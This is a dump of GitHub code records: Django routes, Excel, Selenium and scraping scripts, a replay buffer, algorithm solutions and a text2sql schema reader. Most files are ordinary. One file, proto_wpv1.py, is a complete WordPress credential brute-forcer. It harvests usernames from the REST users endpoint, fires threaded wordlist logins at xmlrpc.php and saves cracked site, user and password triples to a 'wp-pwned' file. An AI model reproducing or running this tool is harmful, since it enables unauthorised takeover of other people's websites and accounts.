conn.close()\n\n\nrun()\n","repo_name":"loleg/kanton-basel-stadt-pdf-publikationen","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8658028927","text":"from django.urls import path\n\nfrom home.average import CityAveragePriceAPIView\nfrom .apis import RoomDetailApiView, RoomApiView, BookingAPIView, BookingCancelAPIView, \\\n UserReviewListAPIView, RoomReviewListAPIView, AmenityAPIView, RoomListingApiView, ReviewCreateListAPIView, \\\n ReviewDelPatchAPIView, ReceiptAPIView\n\nurlpatterns = [\n path('rooms/', RoomListingApiView.as_view()),\n path('listings/<int:pk>/', RoomDetailApiView.as_view(), name='room-detail'),\n path('listings/', RoomApiView.as_view(), name='room-list-generic'),\n path('booking/', BookingAPIView.as_view(), name='booking'),\n path('booking_cancel/', BookingCancelAPIView.as_view(), name='booking-cancel'),\n path('review/user/list/', UserReviewListAPIView.as_view(), name='review-user-list'),\n path('review/room/list/', RoomReviewListAPIView.as_view(), name='review-room-list'),\n path('review/<int:room_id>/', ReviewCreateListAPIView.as_view(), name='review-create'),\n path('review/del-patch/', ReviewDelPatchAPIView.as_view(), name='review-del-patch'),\n path('amenities/', AmenityAPIView.as_view(), name='amenity-view'),\n path('average/', CityAveragePriceAPIView.as_view(), name='average'),\n path('receipt/<int:pk>/', ReceiptAPIView.as_view(), name='receipt'),\n]\n","repo_name":"seongwonhan88/fc-airbnb","sub_path":"app/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"25057242887","text":"#特定の名前のシートを移動する(シートを先頭へ移動)\r\n\r\nfrom openpyxl import load_workbook\r\n\r\nwb = load_workbook(\"チェックリスト.xlsx\")\r\n#対象ファイルの選択\r\n\r\nfor ws in wb.worksheets:\r\n ws.sheet_view.tabSelected = None\r\n#default選択のシートをオフにする。オフにしなければアクティブなシートはまとめシートとグループ化される。\r\n\r\nws_matome = wb[\"まとめ\"]\r\n#シートの現在地を基準とした移動しかできないので、\"まとめ\"シートを変数にする\r\n\r\nwb.move_sheet(ws_matome, offset=-wb.index(ws_matome))\r\n\r\nwb.active = 0\r\n#先頭のシートを選択\r\n\r\nwb.save(\"チェックリスト_変更後.xlsx\")\r\n","repo_name":"jun-yoshiyoshi/python_for_excel","sub_path":"move_top_sheet.py","file_name":"move_top_sheet.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20198796051","text":"#!/usr/bin/python\n#coding: utf-8\n\nimport argparse as arg\nimport sys,time,requests,json,thread\n\nprint(''' \n ____ __ _ __\n / __ \\_________ / /_____| | / /___ __ _____ \n / /_/ / ___/ __ \\/ __/ __ \\ | /| / / __ `/ | / / _ \\\n\n / ____/ / / /_/ / /_/ /_/ / |/ |/ / /_/ /| |/ / __/\n/_/ /_/ \\____/\\__/\\____/|__/|__/\\__,_/ |___/\\___/ \n v1.1\n\n[!] Brute Force Wordpress\n[!] Desenvolvido por ./Cryptonking (B4l0x)\n''')\n\nparser = arg.ArgumentParser(description=\"Wordpress brute/scan by B4l0x\")\nparser.add_argument(\"--url\", \"-u\", help=\"Site wordpress\", required=True, type=str)\nparser.add_argument(\"--wordlist\", \"-w\", help=\"Wordlist de senhas\", required=True, default=\"wordlist.txt\", type=str)\nparser.add_argument(\"--usuario\", help=\"Usuario alvo\", default=\"null\", required=False, type=str)\nparser.add_argument(\"--tempo\", \"-t\", default=\"1\", help=\"Time sleep usado no Thread\", required=False, type=int)\nx = parser.parse_args()\nsite = x.url\n\nsite.replace(\"https://\", \"http://\")\nheader = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36', 'Cookie': 'humans_21909=1'}\nusuarios = []\nwordpressOK = []\nconfirmado= []\nalocthread = thread.allocate_lock()\n\ndef verwp():\n tempo = time.strftime(\"%H:%M:%S\")\n try:\n print(\"[{} INFO] Confirmando site wordpress...\").format(tempo)\n try:\n response = requests.get(site+\"/xmlrpc.php\", timeout=20, headers=header).text\n logins = requests.get(site+\"/wp-json/wp/v2/users\", timeout=20, headers=header).text\n except Exception as e:\n print(\"[{} INFO] Host nao pode ser resolvido erro: {}\").format(tempo, e)\n exit()\n if \"XML-RPC\" in response:\n print(\"[{} INFO] URL {} [XMLRPC] [OK]\").format(tempo,site)\n if \"slug\" in logins:\n print(\"[{} INFO] URL {} [LOGIN] [OK]\").format(tempo,site)\n confirmado.append(\"1\")\n wordpressOK.append(site)\n else:\n print(\"[{} INFO] URL {} [LOGIN API OFF]\").format(tempo,site)\n exit()\n elif \"cptch_input\" or not \"XML-RPC server accepts POST requests only.\" or \"Not Found\" or \"404\" in response:\n print(\"[{} INFO] URL {} [XMLRPC Bloqueado]\").format(tempo,site)\n print(response)\n exit()\n except KeyboardInterrupt:\n print(\"[{} INFO] Obrigado por usar meu script!\").format(tempo)\n exit()\n except Exception as e:\n print(\"[{} INFO] Host nao pode ser resolvido erro: {}\").format(tempo, e)\n exit()\n\ndef capturausuarios():\n tempo = time.strftime(\"%H:%M:%S\")\n try:\n if confirmado[0] != \"\":\n try:\n print(\"\\n[{} INFO] Inciando busca de usuario(s)...\").format(tempo)\n for site in wordpressOK:\n response = requests.get(site+\"/wp-json/wp/v2/users\", timeout=5, headers=header).text\n if \"slug\" in response:\n dados = json.loads(response)\n for user in dados[0:40]:\n print(\"[{} INFO] Usuario(s) encontrado(s): {}\").format(tempo,user['slug'])\n usuarios.append(user['slug'])\n print(\"\")\n elif not \"slug\" in response:\n print(\"[{} INFO] Nao foi possivel encontrar usuario(s) nessa url: {}\").format(tempo,url)\n except Exception as e:\n print(\"[{} INFO] Erro ao obter usuarios, seu teste sera inciado usando admin {}\").format(tempo, e)\n usuarios.append('admin')\n except KeyboardInterrupt:\n print(\"[{} INFO] Obrigado por usar meu script!\").format(tempo)\n exit()\n except:\n print(\"[{} INFO] Falha ao confirmar site wordpress...\").format(tempo)\n exit()\n \ndef brute(i):\n tempo = time.strftime(\"%H:%M:%S\")\n try:\n for site in wordpressOK:\n senha = i.replace(\"\\n\", \"\")\n response = requests.get(site+\"/xmlrpc.php\", timeout=10, headers=header).text\n if \"XML-RPC server accepts POST requests only.\" in response:\n for usuario in usuarios:\n payload='''<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>%s</string></value></param><param><value><string>%s</string></value></param></params></methodCall>'''%(usuario,senha) \n r = requests.post(site+\"/xmlrpc.php\", data=payload, timeout=30, headers=header).text\n if 'isAdmin' in r:\n alocthread.acquire()\n print(\"\\n\\t[{} LOGIN EFETUADO COM SUCESSO] URL: {} <=> {}:{}\\n\").format(str(tempo),site,usuario,senha)\n f = open(\"wp-pwned.txt\", \"a\")\n f.write(site+\" => \"+usuario+\" => \"+senha+\"\\n\")\n f.close()\n break\n alocthread.release()\n elif 'faultString' in r:\n alocthread.acquire()\n print(\"[{} FALHOU] URL: {} <=> {}:{}\").format(str(tempo),site,usuario,senha)\n alocthread.release()\n elif 'Not Acceptable!' in r:\n alocthread.acquire()\n print(\"[{} FIREWALL] URL: {}\").format(str(tempo),site)\n exit()\n break\n alocthread.release()\n else:\n break\n elif \"cptch_input\" or not \"XML-RPC server accepts POST requests only.\" or \"Not Found\" or \"404\" in response:\n print(\"[{} XMLRPC BLOQUEADO] URL {} <=> {}:{}\").format(str(tempo),site,usuario,senha)\n exit()\n except KeyboardInterrupt:\n print(\"[{} INFO] Obrigado por usar meu script!\").format(str(tempo))\n exit()\n except Exception as e:\n print(\"[{} INFO] Conexao perdida com o host, Reconectando...\").format(str(tempo))\n exit()\n \nif(x.usuario == \"null\"):\n verwp()\n capturausuarios()\nelif(x.usuario != \"null\"):\n tempo = time.strftime(\"%H:%M:%S\")\n verwp()\n wordpressOK.append(site)\n confirmado.append(\"1\")\n usuarios.append(x.usuario)\n print(\"[{} INFO] Brute force sera inciado usando login {}\\n\").format(tempo,x.usuario)\n\ntry:\n try:\n wordlist = open(x.wordlist, 'r').readlines()\n except:\n tempo = time.strftime(\"%H:%M:%S\")\n print(\"[{} INFO] Verifique o caminho da wordlist e tente novamente...\").format(tempo)\n exit()\n for i in wordlist:\n time.sleep(0.+x.tempo)\n thread.start_new_thread(brute, (i,))\nexcept KeyboardInterrupt:\n tempo = time.strftime(\"%H:%M:%S\")\n print(\"\\n\\t[{} INFO] Finalizado, obrigado por usar by B4l0x...\\n\").format(tempo)\n exit()\n","repo_name":"truesamurai/WordPress-BruteForce-1.1","sub_path":"proto_wpv1.py","file_name":"proto_wpv1.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42001318852","text":"from typing import List, Tuple, Union\n\nfrom numpy import ndarray, zeros\nfrom torch import Tensor, cat, tensor\nfrom torch import float32 as t_float32\nfrom numpy import float32 as n_float32\nfrom numpy.random import choice as n_choice\n\nfrom classes.utils.Globals import Globals\n\n\nclass ReplayBuffer:\n __CAPACITY: int\n __ALPHA: float\n\n __priorities: ndarray\n __buffer: List[Union[None, Tuple[Tensor, Union[None, int], float, Tensor, bool]]]\n __index: int\n\n def __init__(self, capacity: int, alpha: float):\n self.__CAPACITY = capacity\n self.__ALPHA = alpha\n\n self.__buffer = []\n self.__index = 0\n self.__priorities = zeros((capacity,), dtype=n_float32)\n\n def __len__(self) -> int:\n return len(self.__buffer)\n\n def clear_memory(self) -> None:\n self.__buffer = []\n self.__index = 0\n self.__priorities = zeros((self.__CAPACITY,), dtype=n_float32)\n\n def update_priorities(self, indices: List[int], priorities: ndarray) -> None:\n for index, priority in zip(indices, priorities):\n self.__priorities[index] = priority\n\n def __store(self, memory: Tuple[Tensor, Union[None, int], float, Tensor, bool]) -> None:\n if self.__len__() < self.__CAPACITY:\n self.__buffer = [*self.__buffer, memory]\n return\n self.__buffer[self.__index] = memory\n\n def store_memory(self, state: Tensor, action: Union[int, None], reward: float, next_state: Tensor,\n is_done: bool) -> None:\n if self.__len__() == 100:\n b = True\n # if buffer is not empty get max priority\n maximum_priority: n_float32 = self.__priorities.max() if self.__buffer else n_float32(1.0)\n # store memory and corresponding priority\n\n self.__store(memory=(state, action, reward, next_state, is_done))\n self.__priorities[self.__index] = maximum_priority\n # update index\n self.__index = (self.__index + 1) % self.__CAPACITY\n\n def get_sample(self, amount_of_memories: int, beta: float) -> Tuple[Tensor, Tensor, Tensor,\n Tensor, Tensor, List[int], Tensor]:\n # compute probabilities\n priorities: ndarray = self.__priorities if self.__len__() == self.__CAPACITY else \\\n self.__priorities[:self.__index]\n probabilities: ndarray = (priorities ** self.__ALPHA) / (priorities ** self.__ALPHA).sum()\n\n # retrieve samples from buffer\n memories_indices: ndarray = n_choice(self.__len__(), amount_of_memories, p=probabilities)\n memories_sample: List = [self.__buffer[idx] for idx in memories_indices]\n\n # compute weights\n tmp_weights: ndarray = (self.__len__() * probabilities[memories_indices] ** (-beta))\n tmp_weights /= tmp_weights.max()\n weights: Tensor = tensor(tmp_weights, requires_grad=False, dtype=t_float32).to(Globals.DEVICE_TYPE)\n del tmp_weights\n\n batch = list(zip(*memories_sample))\n states = cat(batch[0]).to(Globals.DEVICE_TYPE)\n actions = tensor(batch[1], requires_grad=False).to(Globals.DEVICE_TYPE)\n rewards = tensor(batch[2], requires_grad=False, dtype=t_float32).to(Globals.DEVICE_TYPE)\n next_states = cat(batch[3]).to(Globals.DEVICE_TYPE)\n # data type as float to convert into numbers\n terminals = tensor(batch[4], requires_grad=False, dtype=t_float32).to(Globals.DEVICE_TYPE)\n\n return states, actions, rewards, next_states, terminals, memories_indices, weights\n","repo_name":"taciochi/FYP","sub_path":"classes/data/memory/ReplayBuffer.py","file_name":"ReplayBuffer.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18406155929","text":"from itertools import accumulate; import math; import operator; import random; import string; from bisect import *; from collections import deque, defaultdict, Counter, OrderedDict; from functools import reduce,cache; from heapq import *; import unittest; from typing import List,Optional; from functools import cache; from operator import lt, gt\nfrom binary_tree_tester import ser,des; from a_linked_list import make_linked_list\ndef get_sol(): return Solution()\ndef getBST(x,y): return BSTIterator(x,y)\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass BSTIterator:\n def __init__(self, root: Optional[TreeNode],forward): # if forward is True-> get nodes in increasing order else in decreasing order\n self.st=[]\n self.forward=forward\n self.add(root)\n def add(self, node):\n while node:\n self.st.append(node)\n if self.forward:\n node=node.left\n else:\n node=node.right\n def next(self) -> int:\n node=self.st.pop()\n if self.forward:\n self.add(node.right)\n else:\n self.add(node.left)\n return node.val\n def hasNext(self) -> bool:\n return len(self.st)!=0\n\nclass Solution:\n # binary search tree iterator\n def findTarget(self, root: TreeNode, target: int) -> bool:\n l=BSTIterator(root,True) # get nodes in increasing order\n r=BSTIterator(root,False) # get nodes in decreasing order\n i=l.next()\n j=r.next()\n while i<j:\n summ=i+j\n if summ==target:\n return True\n if summ<target:\n i=l.next()\n else:\n j=r.next()\n return False\nclass Solution2:\n # bad solution\n def findTarget(self, root: TreeNode, target: int) -> bool:\n sett = set()\n def preorder(root:TreeNode):\n if not root:return False\n if root.val in sett:return True\n sett.add(target-root.val)\n return preorder(root.left) or preorder(root.right)\n return preorder(root)\n\nclass Tester(unittest.TestCase):\n def do_test(self,commands, inputs):\n outputs = []\n obj = \"\"\n for i,cmd,input in zip(range(len(inputs)),commands,inputs):\n if cmd=='BSTIterator': obj = getBST(des(input[0]),True); outputs.append(None)\n elif cmd=='next': outputs.append(obj.next())\n elif cmd=='hasNext': outputs.append(obj.hasNext())\n return outputs\n def test01(self):\n commands = [\"BSTIterator\",\"next\",\"next\",\"hasNext\",\"next\",\"hasNext\",\"next\",\"hasNext\",\"next\",\"hasNext\"]\n inputs=[[[7,3,15,None,None,9,20]],[],[],[],[],[],[],[],[],[]]\n expected = [None, 3, 7, True, 9, True, 15, True, 20, False]\n outputs = self.do_test(commands, inputs)\n self.assertEqual(expected,outputs)\nclass mytestcase(unittest.TestCase):\n def test01(self):\n self.assertEqual(True,get_sol().findTarget(des([5,3,6,2,4,None,7]), 9))\n def test02(self):\n self.assertEqual(False,get_sol().findTarget(des([5,3,6,2,4,None,7]), 28))\n # def test03(self):\n # def test04(self):\n # def test05(self):\n # def test06(self):\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc653.py","file_name":"lc653.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14233411870","text":"# python3\nimport itertools\n\nINF = float('Inf')\n\ndef read_data():\n n, m = map(int, input().split())\n graph = [[INF] * n for _ in range(n)]\n for _ in range(m):\n u, v, weight = map(int, input().split())\n u -= 1\n v -= 1\n graph[u][v] = graph[v][u] = weight\n return graph\n\ndef print_answer(path_weight, path):\n if path_weight == INF:\n print('-1')\n else:\n print(path_weight)\n print(' '.join(map(str, path)))\n\ndef optimal_path(graph):\n n = len(graph)\n C = {}\n\n def get_distance(vertices, last_vertex):\n key = tuple(sorted(vertices))\n if key not in C:\n return INF\n return C[key][last_vertex]\n\n def set_distance(vertices, last_vertex, distance):\n key = tuple(sorted(vertices))\n if key not in C:\n C[key] = [INF] * n\n C[key][last_vertex] = distance\n\n\n set_distance((0,), 0, 0)\n for s in range(1, n):\n for S_ in itertools.combinations(range(1,n), s):\n S = (0,) + S_\n\n # Each new combination can be investigated by looking at\n # all the len(S_) - 1 combinations and looking at their\n # possible extensions to cover the extra vertice.\n for i in S:\n if i == 0:\n continue\n for j in S:\n if j == i:\n continue\n for z in range(len(S)-1, 0, -1):\n if S[z] == i:\n without_i = S[:z] + S[z+1:]\n current = get_distance(S, i)\n new = get_distance(without_i, j) + graph[j][i]\n #print(S, without_i, j, i, current, new)\n if new < current:\n set_distance(S, i, new)\n\n best_path = [] \n best_ans = INF\n \n # for key in sorted(C.keys(), key=lambda x: len(x)):\n # print(key, C[key])\n\n # If a full set of vertices has been found need to manually\n # check which path back to vertice 1 will give the shortest\n # distance. This defines the final vertice in the path.\n for key in C:\n if len(key) == n:\n last_vert = None\n for vert in key:\n distance = get_distance(key, vert) + graph[vert][0]\n if distance < best_ans:\n last_vert = vert\n best_ans = distance\n best_vertices = key\n\n\n # To get the actual path from the set of vertices, basically reverse\n # the steps of the dynamic programming algorithm.\n # No information has been lost.\n best_path = [] \n path_distance = None\n\n def walk_path(remaining, path, distance):\n nonlocal best_path, path_distance\n if len(remaining) == 2:\n best_path = path\n remaining_ = set(remaining)\n remaining_.remove(0)\n path_distance = distance + get_distance(remaining, remaining_.pop())\n return\n\n # Find the vertice in the smaller set that was used\n # to construct a path to path[0].\n remaining_ = set(remaining)\n remaining_.remove(path[0])\n smallest = INF\n path_vertice = None\n for i in remaining_:\n dist = get_distance(remaining_, i)\n if i == 0 or dist == INF:\n continue\n dist_back = graph[i][path[0]] + dist\n if dist_back < smallest:\n smallest = dist_back\n path_vertice = i\n\n assert smallest != INF\n new_path = [path_vertice] + path.copy()\n walk_path(remaining_, new_path, distance + smallest)\n\n if best_ans < INF:\n walk_path(best_vertices, [last_vert, 0], graph[last_vert][0])\n\n # Check path gives the correct distance.\n distance = 0\n if best_ans < INF:\n for i, vert in enumerate(best_path[:-1]):\n distance += graph[vert][best_path[i+1]]\n distance += graph[best_path[-1]][best_path[0]]\n assert distance == best_ans, 'path shows a distance of {0}, but answer was {1}'.format(\n distance, best_ans)\n\n return (best_ans, [x + 1 for x in best_path])\n\nif __name__ == '__main__':\n data = read_data()\n print_answer(*optimal_path(data))\n","repo_name":"mcgaw/psychic-garbanzo","sub_path":"5/week4/school_bus/school_bus.py","file_name":"school_bus.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28849540234","text":"import copy\nN,K,C = list(map(int, input().split()))\nS = list(input())\nmae = [0]*K\nushiro = [0]*K\nhi = 0\nyouso = 0\n\nwhile True:\n if S[hi] == 'o':\n mae[youso] = hi+1\n youso += 1\n if youso == K:\n break\n hi += C\n hi += 1\n\nhi = N-1\nyouso = 0\n\nwhile True:\n if S[hi] == 'o':\n ushiro[youso] = hi+1\n youso += 1\n if youso == K:\n break\n hi -= C\n hi -= 1\nushiro.reverse()\n\nfor j in range(len(mae)):\n if mae[j] == ushiro[j]:\n print(mae[j])\n\n\n\n\n\n\n\n\n\n","repo_name":"kentahoriuchi/Atcorder","sub_path":"ABC161/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7569388617","text":"# -*- coding:utf-8 -*-\n# /usr/bin/env python\n\"\"\"\nDate: 2021/9/2 22:26\nDesc: 通用数据获取(各种来源)\n\"\"\"\nimport requests\nimport pandas as pd\nfrom io import BytesIO\n\n\ndef index_stock_cons_csindex(index: str = \"000300\") -> pd.DataFrame:\n \"\"\"\n 最新股票指数的成份股目录-中证指数网站\n http://www.csindex.com.cn/zh-CN/indices/index-detail/000300\n :param index: 指数代码, 可以通过 index_stock_info 函数获取\n :type index: str\n :return: 最新股票指数的成份股目录\n :rtype: pandas.DataFrame\n \"\"\"\n url = f\"https://csi-web-dev.oss-cn-shanghai-finance-1-pub.aliyuncs.com/static/html/csindex/public/uploads/file/autofile/cons/{index}cons.xls\"\n r = requests.get(url)\n temp_df = pd.read_excel(BytesIO(r.content))\n if '沪市代码Constituent Code SHH' in temp_df.columns and '沪市名称Constituent Name SHH' in temp_df.columns:\n temp_df = temp_df[['沪市代码Constituent Code SHH', '沪市名称Constituent Name SHH']]\n elif '成分券代码Constituent Code' in temp_df.columns and '成分券名称Constituent Name' in temp_df.columns:\n temp_df = temp_df[['成分券代码Constituent Code', '成分券名称Constituent Name']]\n temp_df.columns = [\"代码\", \"名称\"]\n temp_df['代码'] = temp_df['代码'].astype(str).str.zfill(6)\n temp_df.dropna(inplace=True)\n return temp_df\n","repo_name":"zhangjf666/trading","sub_path":"trading/api/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"8179569393","text":"\"\"\"\nUtility functions for reading the standardised text2sql datasets presented in\n`\"Improving Text to SQL Evaluation Methodology\" <https://arxiv.org/abs/1806.09029>`_\n\"\"\"\nimport json\nimport os\nimport sqlite3\nfrom collections import defaultdict\nfrom typing import List, Dict, Optional\n\nfrom allennlp.common import JsonDict\n\n\nclass TableColumn:\n \"\"\"\n Representing the column of table\n \"\"\"\n def __init__(self,\n name: str,\n text: str,\n column_type: str,\n is_primary_key: bool,\n refer_table,\n foreign_key: Optional[List[str]]):\n self.name = name\n self.text = text\n self.column_type = column_type\n self.is_primary_key = is_primary_key\n self.foreign_key = foreign_key\n self.refer_table = refer_table\n\n def __str__(self):\n return f'{self.name}'\n\n\nclass Table:\n \"\"\"\n Representing the table\n \"\"\"\n def __init__(self,\n name: str,\n text: str,\n columns: List[TableColumn]):\n self.name = name\n self.text = text\n self.columns = columns\n\n\ndef read_dataset_schema(schema_path: str):\n \"\"\"\n Reading all table from `schema_path`.\n :param schema_path: default from `tables.json` of sparc data folder.\n :return:\n \"\"\"\n schemas: Dict[str, Dict[str, Table]] = defaultdict(dict)\n schema_id_to_table: Dict[str, Dict[int, Table]] = defaultdict(dict)\n schema_id_to_col: Dict[str, Dict[int, TableColumn]] = defaultdict(dict)\n\n dbs_json_blob = json.load(open(schema_path, \"r\"))\n for db in dbs_json_blob:\n db_id = db['db_id']\n\n column_id_to_table = {}\n column_id_to_column = {}\n\n for i, (column, text, column_type) in enumerate(zip(db['column_names_original'],\n db['column_names'],\n db['column_types'])):\n table_id, column_name = column\n _, column_text = text\n\n table_name = db['table_names_original'][table_id]\n\n if table_name not in schemas[db_id]:\n table_text = db['table_names'][table_id]\n table_obj = Table(table_name, table_text, [])\n schemas[db_id][table_name] = table_obj\n\n # TODO: we cannot add an extra command to handle * problem.\n # we now use a special embedding for linking * and predicting action\n # if column_name == '*':\n # continue\n\n table_obj = schemas[db_id][table_name]\n\n if column_name == \"*\":\n is_primary_key = False\n else:\n is_primary_key = i in db['primary_keys']\n # allocate new column object\n column_obj = TableColumn(column_name.lower(), column_text, column_type,\n is_primary_key, table_obj, None)\n schemas[db_id][table_name].columns.append(column_obj)\n column_id_to_column[i] = column_obj\n\n for (c1, c2) in db['foreign_keys']:\n foreign_key = column_id_to_column[c2].refer_table.name + ':' + column_id_to_column[c2].name\n\n # TODO: we able multiple foreign keys existing to allow the shortcut join\n if column_id_to_column[c1].foreign_key is None:\n column_id_to_column[c1].foreign_key = []\n\n column_id_to_column[c1].foreign_key.append(foreign_key)\n\n for i, table_name in enumerate(db['table_names_original']):\n column_id_to_table[i] = schemas[db_id][table_name]\n\n # assign id to column and id to table\n schema_id_to_table[db_id] = column_id_to_table\n schema_id_to_col[db_id] = column_id_to_column\n return {**schemas}, {**schema_id_to_col}, {**schema_id_to_table}\n\n\ndef read_dataset_values(db_id: str, dataset_path: str, tables: List[str]):\n db = os.path.join(dataset_path, db_id, db_id + \".sqlite\")\n try:\n conn = sqlite3.connect(db)\n except Exception as e:\n raise Exception(f\"Can't connect to SQL: {e} in path {db}\")\n conn.text_factory = str\n cursor = conn.cursor()\n\n values = {}\n\n for table in tables:\n try:\n cursor.execute(f\"SELECT * FROM {table.name} LIMIT 5000\")\n values[table] = cursor.fetchall()\n except:\n conn.text_factory = lambda x: str(x, 'latin1')\n cursor = conn.cursor()\n cursor.execute(f\"SELECT * FROM {table.name} LIMIT 5000\")\n values[table] = cursor.fetchall()\n\n return values\n\n\ndef ent_key_to_name(key):\n parts = key.split(':')\n if parts[0] == 'table':\n return parts[1]\n elif parts[0] == 'column':\n _, _, table_name, column_name = parts\n return f'{table_name}@{column_name}'\n else:\n return parts[1]\n\n\ndef fix_number_value(ex: JsonDict):\n \"\"\"\n There is something weird in the dataset files - the `query_toks_no_value` field anonymizes all values,\n which is good since the evaluator doesn't check for the values. But it also anonymizes numbers that\n should not be anonymized: e.g. LIMIT 3 becomes LIMIT 'value', while the evaluator fails if it is not a number.\n \"\"\"\n\n def split_and_keep(s, sep):\n if not s: return [''] # consistent with string.split()\n\n # Find replacement character that is not used in string\n # i.e. just use the highest available character plus one\n # Note: This fails if ord(max(s)) = 0x10FFFF (ValueError)\n p = chr(ord(max(s)) + 1)\n\n return s.replace(sep, p + sep + p).split(p)\n\n # input is tokenized in different ways... so first try to make splits equal\n query_toks = ex['query_toks']\n ex['query_toks'] = []\n for q in query_toks:\n ex['query_toks'] += split_and_keep(q, '.')\n\n i_val, i_no_val = 0, 0\n while i_val < len(ex['query_toks']) and i_no_val < len(ex['query_toks_no_value']):\n if ex['query_toks_no_value'][i_no_val] != 'value':\n i_val += 1\n i_no_val += 1\n continue\n\n i_val_end = i_val\n while i_val + 1 < len(ex['query_toks']) and \\\n i_no_val + 1 < len(ex['query_toks_no_value']) and \\\n ex['query_toks'][i_val_end + 1].lower() != ex['query_toks_no_value'][i_no_val + 1].lower():\n i_val_end += 1\n\n if i_val == i_val_end and ex['query_toks'][i_val] in [\"1\", \"2\", \"3\"] and ex['query_toks'][i_val - 1].lower() == \"limit\":\n ex['query_toks_no_value'][i_no_val] = ex['query_toks'][i_val]\n i_val = i_val_end\n\n i_val += 1\n i_no_val += 1\n\n return ex\n","repo_name":"microsoft/ContextualSP","sub_path":"interactive_text_to_sql/src/context/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6663,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"21"} +{"seq_id":"23383605408","text":"import math\n\nt = int(input())\nfor _ in range(t):\n N, K, S = map(int, input().split())\n\n choc_req = K*S\n days_req = math.ceil(choc_req/N)\n days_last = S - (S//7)\n\n if days_req <= days_last:\n print(days_req)\n else:\n print(-1)","repo_name":"kaushal-py/competitive","sub_path":"2018/January Cook off/SURVIVE.py","file_name":"SURVIVE.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42758650696","text":"import requests\nfrom bs4 import BeautifulSoup # bs4 to import beautiful soup 4\nimport pprint # pprint = pretty print is a built-in module to print in a nicer way (more spaces, etc)\n \n\ndef sort_stories_by_votes(hnlist):\n return sorted(hnlist, key= lambda k : k['votes'], reverse=True) # sort the hn list by the votes key,\n # and reverse so it's > to <\n\n\nhn = []\n\n\ndef hn_data(page_number):\n res = requests.get('https://news.ycombinator.com/news?p=' + str(page_number))\n soup = BeautifulSoup(res.text, 'html.parser')\n links = soup.select('.titlelink')\n subtext = soup.select('.subtext') # grab the subtext (the scores are inside the subtext) bc all articles\n # have a subtext, but not all have votes. then we'll grab the scores from there\n\n def create_custom_hn(links, subtext):\n for index, item in enumerate(links):\n title = links[index].getText() # getText so that we get the text and not the html\n href = links[index].get('href', None) # get href=... it's the link. None is the default value\n vote = subtext[index].select('.score') # grab the score from the subtext and returns it in a\n # one-item list. that's why later we have to use \n # vote[0], bc we need the text, not the list.\n\n if len(vote): # if it has any votes (!= 0)\n points = int(vote[0].getText().replace(' points', '')) # replace points with an empty string\n if points >= 100: # so that we get relevant articles\n hn.append({'title': title, 'link': href, 'votes': points}) # appends dicts into the list\n return hn \n return create_custom_hn(links, subtext)\n\n\n\nfor x in range(1, 3):\n hn_data(x) # runs the function twice so now hn contains info from page 1 and 2\n\n\npprint.pprint(sort_stories_by_votes(hn)) # sorts the new hn list while using pretty print\n","repo_name":"candebarcelo/python-scripts","sub_path":"web_scraper.py","file_name":"web_scraper.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19196706664","text":"\nfrom selenium import webdriver\nfrom selenium.webdriver import ActionChains\n\ndriver = webdriver.Chrome()\n\ndriver.get(\"https://jqueryui.com/resources/demos/droppable/default.html\")\n\nvar1 = driver.find_element_by_xpath(\"//p[contains(text(),'Drag me to my target')]\")\nvar2 = driver.find_element_by_xpath(\"//div[@id='droppable']\")\n\nvar3 = ActionChains(driver)\n\n#var3.drag_and_drop(var1, var2).perform()\n\n#interview Question : other way click and hold and move to element\nvar3.click_and_hold(var1).move_to_element(var2).perform()","repo_name":"sandeepbhutkar/SeleniumPython-and-RobotFramework-Multiple-Projects","sub_path":"SeleniumWithPython_2/12DragDropActionChain.py","file_name":"12DragDropActionChain.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1296814341","text":"import csv\nimport sys\n\n# cmd argument 1: folder to process\nfolder = sys.argv[1]\n\ndata = {}\nnames = []\npreamble = \"Lib\"\n\nwith open(folder + \"/bench.csv\", \"rt\", encoding=\"utf8\") as benchfile:\n reader = csv.reader(benchfile)\n\n line_nr = 0\n for line in reader:\n if line_nr == 0:\n line_nr += 1\n continue\n [bench_type, bench_name, bench_n] = line[0].split(\"/\", 2)\n bench_mean = line[1]\n bench_mean_lb = line[2]\n bench_mean_ub = line[3]\n data.setdefault(bench_type, {}).setdefault(bench_name, 